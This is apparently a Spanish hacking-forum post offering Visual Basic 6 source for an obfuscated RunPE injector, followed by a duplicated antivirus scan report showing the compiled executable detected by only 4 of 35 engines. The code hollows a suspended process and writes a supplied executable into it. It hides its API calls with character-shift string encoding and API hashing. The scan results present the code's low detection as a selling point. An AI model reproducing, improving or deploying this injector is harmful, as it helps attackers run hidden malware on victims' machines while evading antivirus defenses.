Código: Seleccionar todo
Declare Function Nc6h0fItx Lib "USER32" Alias "CallWindowProcA" (ByRef cCode As Currency, Optional ByVal lP1 As Long, Optional ByVal lP2 As Long, Optional ByVal lP3 As Long, Optional ByVal lP4 As Long) As Long
Declare Function tp2dEV01q Lib "USER32" Alias "CallWindowProcA" (ByVal Address As Any, Optional ByVal Param1 As Long, Optional ByVal Param2 As Long, Optional ByVal Param3 As Long, Optional ByVal Param4 As Long) As Long
Declare Function W5pA2sP4G Lib "kernel32" Alias "MulDiv" (ByRef a As Any, Optional ByVal B As Long = 1, Optional ByVal c As Long = 1) As Long
Private sVALUE As Byte
Private sMEMORY(40) As Byte
Private ASM_GETAPIPTR(170) As Byte
Private ASM_CALLCODE(255) As Byte
Private IMAGE_DOS_HEADER(65) As Byte
Private IMAGE_NT_HEADERS(256) As Byte
Private IMAGE_SECTION_HEADER(60) As Byte
Private PROCESS_INFORMATION(44) As Byte
Private tCONTEXT(210) As Byte
Private STARTUPINFO(16) As Long
Private sParams As Long
Private sImageBase As Long
Private sProcess As Long
Private sThread As Long
Private SizeOfImage As Long
Private SizeOfHeaders As Long
Private sEntryPoint As Long
Private sVirtualAddress As Long
Private sRawData As Long
Private sRawDataPoint As Long
Private sEbx As Long
Private D As Long
Private Y As Long
Private vItem As Variant
Private sSection As Integer
Public Function Injeccion(ByVal sHost As String, ByRef sBytes() As Byte)
For Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, _
&HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H10)
sMEMORY(Y) = vItem
Y = Y + 1
sVALUE = 200 + 48
Next
Call wZBrQ0Wzf(W5pA2sP4G(STARTUPINFO(0)), W5pA2sP4G(72), CLng(fXFIu0V0G("3", "3")))
Call wZBrQ0Wzf(W5pA2sP4G(tCONTEXT(CLng(fXFIu0V0G("3", "3")))), W5pA2sP4G(&H10007), &H1 + &H4 + &H3)
Call wZBrQ0Wzf(W5pA2sP4G(IMAGE_DOS_HEADER(CLng(fXFIu0V0G("3", "3")))), W5pA2sP4G(sBytes(CLng(fXFIu0V0G("3", "3")))), 72)
Call wZBrQ0Wzf(W5pA2sP4G(sParams), W5pA2sP4G(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)
Call wZBrQ0Wzf(W5pA2sP4G(IMAGE_NT_HEADERS(CLng(fXFIu0V0G("3", "3")))), W5pA2sP4G(sBytes(sParams)), 256)
Call wZBrQ0Wzf(W5pA2sP4G(sImageBase), W5pA2sP4G(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)
Call wZBrQ0Wzf(W5pA2sP4G(SizeOfImage), W5pA2sP4G(IMAGE_NT_HEADERS(80)), &H1 + &H4 + &H3)
Call wZBrQ0Wzf(W5pA2sP4G(SizeOfHeaders), W5pA2sP4G(IMAGE_NT_HEADERS(84)), &H1 + &H4 + &H3)
Call wZBrQ0Wzf(W5pA2sP4G(sEntryPoint), W5pA2sP4G(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)
Call wZBrQ0Wzf(W5pA2sP4G(sSection), W5pA2sP4G(IMAGE_NT_HEADERS(6)), &H2)
Call otTJ32XxZ(fXFIu0V0G("PJWSJQ87", "5"), fXFIu0V0G("HwjfyjUwthjxx\", "5"), 0, StrPtr(sHost), 0, 0, &H1, &H4, 0, 0, W5pA2sP4G(STARTUPINFO(CLng(fXFIu0V0G("3", "3")))), W5pA2sP4G(PROCESS_INFORMATION(CLng(fXFIu0V0G("3", "3")))))
Call wZBrQ0Wzf(W5pA2sP4G(sProcess), W5pA2sP4G(PROCESS_INFORMATION(CLng(fXFIu0V0G("3", "3")))), &H1 + &H3)
Call wZBrQ0Wzf(W5pA2sP4G(sThread), W5pA2sP4G(PROCESS_INFORMATION(4)), &H1 + &H3)
Call otTJ32XxZ(fXFIu0V0G("SYIQQ", "5"), fXFIu0V0G("U{\uthw]pl~VmZlj{pvu", "7"), sProcess, sImageBase)
Call otTJ32XxZ(fXFIu0V0G("PJWSJQ87", "5"), fXFIu0V0G("ZmvxyepEppsgI|", "4"), sProcess, sImageBase, SizeOfImage, &H3000&, &H40)
Call otTJ32XxZ(fXFIu0V0G("SYIQQ", "5"), fXFIu0V0G("Sy\wnyj[nwyzfqRjrtw~", "5"), sProcess, sImageBase, W5pA2sP4G(sBytes(CLng(fXFIu0V0G("3", "3")))), SizeOfHeaders, CLng(fXFIu0V0G("3", "3")))
For D = 0 To sSection - 1
Call wZBrQ0Wzf(W5pA2sP4G(IMAGE_SECTION_HEADER(CLng(fXFIu0V0G("3", "3")))), W5pA2sP4G(sBytes(sParams + sVALUE + 40 * D)), &H40)
Call wZBrQ0Wzf(W5pA2sP4G(sVirtualAddress), W5pA2sP4G(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)
Call wZBrQ0Wzf(W5pA2sP4G(sRawDataPoint), W5pA2sP4G(IMAGE_SECTION_HEADER(16)), &H1 + &H4 + &H3)
Call wZBrQ0Wzf(W5pA2sP4G(sRawData), W5pA2sP4G(IMAGE_SECTION_HEADER(20)), &H1 + &H3)
Call otTJ32XxZ(fXFIu0V0G("SYIQQ", "5"), fXFIu0V0G("Sy\wnyj[nwyzfqRjrtw~", "5"), sProcess, sImageBase + sVirtualAddress, W5pA2sP4G(sBytes(sRawData)), sRawDataPoint, CLng(fXFIu0V0G("3", "3")))
Next
Call otTJ32XxZ(fXFIu0V0G("SYIQQ", "5"), fXFIu0V0G("TzMkzIutzk~zZnxkgj", "6"), sThread, W5pA2sP4G(tCONTEXT(CLng(fXFIu0V0G("3", "3")))))
Call otTJ32XxZ(fXFIu0V0G("SYIQQ", "5"), fXFIu0V0G("Sy\wnyj[nwyzfqRjrtw~", "5"), sProcess, sEbx + &H4 + &H1 + &H3, W5pA2sP4G(sVirtualAddress), &H1 + &H3 + &H2, CLng(fXFIu0V0G("3", "3")))
Call wZBrQ0Wzf(W5pA2sP4G(tCONTEXT(176)), W5pA2sP4G(sImageBase + sEntryPoint), &H1 + &H3)
Call wZBrQ0Wzf(W5pA2sP4G(sEntryPoint), W5pA2sP4G(tCONTEXT(176)), &H1 + &H3)
Call otTJ32XxZ(fXFIu0V0G("SYIQQ", "5"), fXFIu0V0G("U{Zl{Jvu{l{[oylhk", "7"), sThread, W5pA2sP4G(tCONTEXT(CLng(fXFIu0V0G("3", "3")))))
Call otTJ32XxZ(fXFIu0V0G("SYIQQ", "5"), fXFIu0V0G("W}[n|~vn]q{njm", "9"), sThread, CLng(fXFIu0V0G("3", "3")))
End Function
Public Sub wZBrQ0Wzf(ByVal lpDest As Long, ByVal lpSource As Long, ByVal cBytes As Long)
tp2dEV01q W5pA2sP4G(sMEMORY(0)), lpDest, lpSource, cBytes, CLng(fXFIu0V0G("3", "3"))
End Sub
Function otTJ32XxZ(ByVal sDLL As String, hHash As String, ParamArray vParams() As Variant) As Long
On Error Resume Next
Dim vItem As Variant
Dim sThunk As String
Call NaOQLcL51(yQXnZUxqC, ASM_GETAPIPTR)
For Each vItem In vParams
sThunk = fXFIu0V0G(";=", "5") & TOZLczCsK(vItem) & sThunk
Next vItem
Call NaOQLcL51(sThunk & fXFIu0V0G("J@", "8") & TOZLczCsK(tp2dEV01q(VarPtr(ASM_GETAPIPTR(CLng(fXFIu0V0G("3", "3")))), _
StrPtr(sDLL), s08b9DV41(hHash))) & fXFIu0V0G("HHF2E5", "2") & sThunk, ASM_CALLCODE)
otTJ32XxZ = tp2dEV01q(VarPtr(ASM_CALLCODE(CLng(fXFIu0V0G("3", "3")))))
End Function
Private Function s08b9DV41(strHash) As Long
On Error Resume Next
Dim i As Long
Dim lResult As Long
For i = 1 To Len(strHash)
lResult = Nc6h0fItx(-439163333029263.6533@, lResult)
lResult = lResult + Asc(Mid(strHash, i, 1))
Next i
s08b9DV41 = fXFIu0V0G(",N", "6") & String(8 - Len(Hex(lResult)), fXFIu0V0G("3", "3")) & Hex(lResult)
End Function
Private Function TOZLczCsK(ByVal lLng As Long) As String
On Error Resume Next
Dim lTMP As Long
lTMP = (((lLng And &HFF000000) \ &H1000000) And &HFF&) Or ((lLng And &HFF0000) \ &H100&) Or ((lLng And &HFF00&) * &H100&) Or ((lLng And &H7F&) * &H1000000) ' by Mike D Sutton
If (lLng And &H80&) Then lTMP = lTMP Or &H80000000
TOZLczCsK = String(8 - Len(Hex(lTMP)), fXFIu0V0G("3", "3")) & Hex(lTMP)
End Function
Private Sub NaOQLcL51(ByVal sThunk As String, ByRef bvRet() As Byte)
On Error Resume Next
Dim i As Long
For i = 0 To Len(sThunk) - 1 Step 2
bvRet((i / 2)) = (fXFIu0V0G(",N", "6") & Mid(sThunk, i + 1, 2))
Next i
End Sub
Function yQXnZUxqC() As String
yQXnZUxqC = fXFIu0V0G("K>88666666<>G::K6KKI;6K>:9666666>9I:6>LL=:8:6:LLJ6LL=:8:", "6")
yQXnZUxqC = yQXnZUxqC & fXFIu0V0G("1961F94111111194D519D4676642D1759C81419C871D9C872D9C7F19", "1")
yQXnZUxqC = yQXnZUxqC & fXFIu0V0G("=G<J75=G8;8=9<6=<:K8=58K;G<95<=58K9G<957JGJ<=>J=:I:JH8::", "5")
yQXnZUxqC = yQXnZUxqC & fXFIu0V0G("<9<8<:<=<>?I=J9;8J?<LK>;;:?I;<:J?I<;7<>?78LH?I;H8??I<H97", "7")
yQXnZUxqC = yQXnZUxqC & fXFIu0V0G("89MJM;;8<A@J;<@J89MM;9NN;9K8NKIK@<K8?<8?K9KN8L89K?MJN<;J", "8")
yQXnZUxqC = yQXnZUxqC & fXFIu0V0G("<H7975<:J6=G:F7956JG;;=G5H9G=G:F6H56JG=G59=G56J=:K:J:G:>:F:IH8", "5")
End Function
Public Function fXFIu0V0G(strInput As String, second As Integer)
Dim first As Integer
For first = 1 To Len(strInput)
Mid(strInput, first, 1) = Chr(Asc(Mid(strInput, first, 1)) - second)
Next first
fXFIu0V0G = strInput
End Function
Filename : Project1run.exe
Type : File
Filesize : 20480 bytes
Date : 02/02/2014 - 19:21 GMT+2
MD5 : a6fbfaf3ab252cd4034b8780dac8a7ac
SHA1 : 9540bf188590aad4fbabfc5e9bd999ae842adf2e
Status : Infected
Result :4/35
AVG Free - OK
ArcaVir - OK
Avast - OK
AntiVir (Avira) - OK
BitDefender - OK
VirusBuster Internet Security - OK
Clam Antivirus - OK
COMODO Internet Security - OK
Dr.Web - OK
eTrust-Vet - OK
F-PROT Antivirus - OK
F-Secure Internet Security - OK
G Data - OK
IKARUS Security - Trojan-Dropper.Vb
Kaspersky Antivirus - OK
McAfee - OK
MS Security Essentials - OK
ESET NOD32 - OK
Norman - OK
Norton Antivirus - OK
Panda Security - OK
A-Squared - Trojan-Dropper.Vb!IK
Quick Heal Antivirus - OK
Solo Antivirus - OK
Sophos - MalOKgent-GR
Trend Micro Internet Security - OK
VBA32 Antivirus - OK
Zoner AntiVirus - OK
Ad-Aware - OK
BullGuard - OK
Immunet Antivirus - OK
K7 Ultimate - EmailWorm ( 0040f6681 )
NANO Antivirus - OK
Panda CommandLine - OK
VIPRE - OK
Scan Result: [Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
Type : File
Filesize : 20480 bytes
Date : 02/02/2014 - 19:21 GMT+2
MD5 : a6fbfaf3ab252cd4034b8780dac8a7ac
SHA1 : 9540bf188590aad4fbabfc5e9bd999ae842adf2e
Status : Infected
Result :4/35
AVG Free - OK
ArcaVir - OK
Avast - OK
AntiVir (Avira) - OK
BitDefender - OK
VirusBuster Internet Security - OK
Clam Antivirus - OK
COMODO Internet Security - OK
Dr.Web - OK
eTrust-Vet - OK
F-PROT Antivirus - OK
F-Secure Internet Security - OK
G Data - OK
IKARUS Security - Trojan-Dropper.Vb
Kaspersky Antivirus - OK
McAfee - OK
MS Security Essentials - OK
ESET NOD32 - OK
Norman - OK
Norton Antivirus - OK
Panda Security - OK
A-Squared - Trojan-Dropper.Vb!IK
Quick Heal Antivirus - OK
Solo Antivirus - OK
Sophos - MalOKgent-GR
Trend Micro Internet Security - OK
VBA32 Antivirus - OK
Zoner AntiVirus - OK
Ad-Aware - OK
BullGuard - OK
Immunet Antivirus - OK
K7 Ultimate - EmailWorm ( 0040f6681 )
NANO Antivirus - OK
Panda CommandLine - OK
VIPRE - OK
Scan Result: [Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
